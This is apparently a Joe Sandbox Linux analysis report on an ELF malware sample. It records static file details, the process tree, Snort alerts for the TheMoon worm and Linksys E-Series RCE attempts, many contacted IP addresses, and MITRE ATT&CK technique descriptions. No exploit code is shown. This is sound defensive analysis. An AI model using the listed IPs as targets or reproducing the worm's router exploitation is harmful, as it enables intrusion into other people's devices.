SSDEEP:	768:zo8Gll0RqYIijCGW8V5Y0rmppCyJwDs8F/F2z4gl8cqpN/:znRqYIi2L6OSlFsz4w8cqp
TLSH:	04235BC5AA93DDF9EC110AB520369F328AB7E53E60A4DAC3C3E59473D902603E11735D
File Content Preview:	.ELF....................d...4...D.......4. ...(.....................@...@...............D...DD..DD..................Q.td............................U..S............h....c...[]...$.............U......=.F...t..5.....D......D......u........t....h@4..........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	46660
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0xa386	0x0	0x6	AX	16
.fini	PROGBITS	0x8052436	0xa436	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x8052460	0xa460	0xfe0	0x0	0x2	A	32
.ctors	PROGBITS	0x8054444	0xb444	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x805444c	0xb44c	0x8	0x0	0x3	WA	4
.jcr	PROGBITS	0x8054454	0xb454	0x4	0x0	0x3	WA	4
.data	PROGBITS	0x8054480	0xb480	0x180	0x0	0x3	WA	32
.bss	NOBITS	0x8054600	0xb600	0x740	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0xb600	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0xb440	0xb440	6.4709	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0xb444	0x8054444	0x8054444	0x1bc	0x8fc	3.8053	0x6	RW	0x1000	.ctors .dtors .jcr .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

System Behavior

Analysis Process: 86O41HaCl5.elf PID: 6214, Parent PID: 6129

General

Start time (UTC):	16:04:39
Start date (UTC):	21/12/2023
Path:	/tmp/86O41HaCl5.elf
Arguments:	/tmp/86O41HaCl5.elf
File size:	47100 bytes
MD5 hash:	77f6dbb4a1c2a1ca81d8f59fcc8f995d

Start time (UTC):	16:04:39
Start date (UTC):	21/12/2023
Path:	/tmp/86O41HaCl5.elf
Arguments:	-
File size:	47100 bytes
MD5 hash:	77f6dbb4a1c2a1ca81d8f59fcc8f995d

Start time (UTC):	16:04:39
Start date (UTC):	21/12/2023
Path:	/tmp/86O41HaCl5.elf
Arguments:	-
File size:	47100 bytes
MD5 hash:	77f6dbb4a1c2a1ca81d8f59fcc8f995d

Start time (UTC):	16:04:39
Start date (UTC):	21/12/2023
Path:	/tmp/86O41HaCl5.elf
Arguments:	-
File size:	47100 bytes
MD5 hash:	77f6dbb4a1c2a1ca81d8f59fcc8f995d

Analysis Process: 86O41HaCl5.elf PID: 6218, Parent PID: 6215

General

Start time (UTC):	16:04:39
Start date (UTC):	21/12/2023
Path:	/tmp/86O41HaCl5.elf
Arguments:	-
File size:	47100 bytes
MD5 hash:	77f6dbb4a1c2a1ca81d8f59fcc8f995d

Analysis Process: 86O41HaCl5.elf PID: 6220, Parent PID: 6215

General

Start time (UTC):	16:04:39
Start date (UTC):	21/12/2023
Path:	/tmp/86O41HaCl5.elf
Arguments:	-
File size:	47100 bytes
MD5 hash:	77f6dbb4a1c2a1ca81d8f59fcc8f995d

Start time (UTC):	16:06:05
Start date (UTC):	21/12/2023
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	16:06:05
Start date (UTC):	21/12/2023
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.cQn9x2yAlZ /tmp/tmp.PRPRcDblVS /tmp/tmp.P0JqeoQ9qa
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Source: 86O41HaCl5.elf	Virustotal: Detection: 64%			Perma Link
Source: 86O41HaCl5.elf	ReversingLabs: Detection: 75%

Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54426 -> 136.41.4.75:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54426 -> 136.41.4.75:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54426 -> 136.41.4.75:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39624 -> 104.27.95.81:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39624 -> 104.27.95.81:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39624 -> 104.27.95.81:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34992 -> 146.19.80.251:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34992 -> 146.19.80.251:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34992 -> 146.19.80.251:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40308 -> 166.168.54.103:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40308 -> 166.168.54.103:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:40308 -> 166.168.54.103:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38692 -> 86.115.3.230:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38692 -> 86.115.3.230:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:38692 -> 86.115.3.230:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60786 -> 216.78.17.25:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60786 -> 216.78.17.25:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60786 -> 216.78.17.25:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46006 -> 35.201.98.249:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46006 -> 35.201.98.249:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:46006 -> 35.201.98.249:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48826 -> 175.225.155.12:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48826 -> 175.225.155.12:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48826 -> 175.225.155.12:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57612 -> 45.60.57.209:8080
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57612 -> 45.60.57.209:8080
Source: Traffic	Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:57612 -> 45.60.57.209:8080

Source: unknown	TCP traffic detected without corresponding DNS query: 162.56.228.146
Source: unknown	TCP traffic detected without corresponding DNS query: 86.188.162.146
Source: unknown	TCP traffic detected without corresponding DNS query: 57.156.233.34
Source: unknown	TCP traffic detected without corresponding DNS query: 166.108.78.69
Source: unknown	TCP traffic detected without corresponding DNS query: 69.117.67.66
Source: unknown	TCP traffic detected without corresponding DNS query: 114.142.93.156
Source: unknown	TCP traffic detected without corresponding DNS query: 143.104.116.185
Source: unknown	TCP traffic detected without corresponding DNS query: 154.152.66.148
Source: unknown	TCP traffic detected without corresponding DNS query: 219.21.162.60
Source: unknown	TCP traffic detected without corresponding DNS query: 177.172.60.33
Source: unknown	TCP traffic detected without corresponding DNS query: 81.62.71.122
Source: unknown	TCP traffic detected without corresponding DNS query: 86.152.184.126
Source: unknown	TCP traffic detected without corresponding DNS query: 116.193.143.237
Source: unknown	TCP traffic detected without corresponding DNS query: 170.77.195.165
Source: unknown	TCP traffic detected without corresponding DNS query: 111.13.88.155
Source: unknown	TCP traffic detected without corresponding DNS query: 153.128.74.251
Source: unknown	TCP traffic detected without corresponding DNS query: 1.46.205.249
Source: unknown	TCP traffic detected without corresponding DNS query: 117.50.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 97.86.31.252
Source: unknown	TCP traffic detected without corresponding DNS query: 46.148.5.36
Source: unknown	TCP traffic detected without corresponding DNS query: 18.81.57.180
Source: unknown	TCP traffic detected without corresponding DNS query: 102.190.45.206
Source: unknown	TCP traffic detected without corresponding DNS query: 125.253.251.71
Source: unknown	TCP traffic detected without corresponding DNS query: 71.133.72.130
Source: unknown	TCP traffic detected without corresponding DNS query: 219.125.145.50
Source: unknown	TCP traffic detected without corresponding DNS query: 109.63.8.86
Source: unknown	TCP traffic detected without corresponding DNS query: 190.83.0.22
Source: unknown	TCP traffic detected without corresponding DNS query: 182.127.144.224
Source: unknown	TCP traffic detected without corresponding DNS query: 87.143.25.214
Source: unknown	TCP traffic detected without corresponding DNS query: 158.132.100.167
Source: unknown	TCP traffic detected without corresponding DNS query: 185.115.127.172
Source: unknown	TCP traffic detected without corresponding DNS query: 155.82.150.221
Source: unknown	TCP traffic detected without corresponding DNS query: 79.69.200.124
Source: unknown	TCP traffic detected without corresponding DNS query: 52.28.253.237
Source: unknown	TCP traffic detected without corresponding DNS query: 99.70.90.174
Source: unknown	TCP traffic detected without corresponding DNS query: 32.225.180.162
Source: unknown	TCP traffic detected without corresponding DNS query: 111.108.31.16
Source: unknown	TCP traffic detected without corresponding DNS query: 177.107.182.85
Source: unknown	TCP traffic detected without corresponding DNS query: 164.31.158.101
Source: unknown	TCP traffic detected without corresponding DNS query: 128.184.122.68
Source: unknown	TCP traffic detected without corresponding DNS query: 38.173.64.158
Source: unknown	TCP traffic detected without corresponding DNS query: 104.96.85.29
Source: unknown	TCP traffic detected without corresponding DNS query: 194.232.66.175
Source: unknown	TCP traffic detected without corresponding DNS query: 202.225.238.113
Source: unknown	TCP traffic detected without corresponding DNS query: 182.82.29.185
Source: unknown	TCP traffic detected without corresponding DNS query: 73.220.142.42
Source: unknown	TCP traffic detected without corresponding DNS query: 223.41.145.228
Source: unknown	TCP traffic detected without corresponding DNS query: 20.162.22.63
Source: unknown	TCP traffic detected without corresponding DNS query: 166.62.213.91
Source: unknown	TCP traffic detected without corresponding DNS query: 37.0.35.48

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report 86O41HaCl5.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

System Behavior

Analysis Process: 86O41HaCl5.elf PID: 6214, Parent PID: 6129

General

Chronological Activities

Analysis Process: 86O41HaCl5.elf PID: 6215, Parent PID: 6214

General

Chronological Activities

Analysis Process: 86O41HaCl5.elf PID: 6216, Parent PID: 6215

General

Chronological Activities

Analysis Process: 86O41HaCl5.elf PID: 6217, Parent PID: 6215

General

Analysis Process: 86O41HaCl5.elf PID: 6218, Parent PID: 6215

General

Analysis Process: 86O41HaCl5.elf PID: 6220, Parent PID: 6215

General

Chronological Activities

Analysis Process: dash PID: 6281, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6281, Parent PID: 4331

General

Linux Analysis Report
86O41HaCl5.elf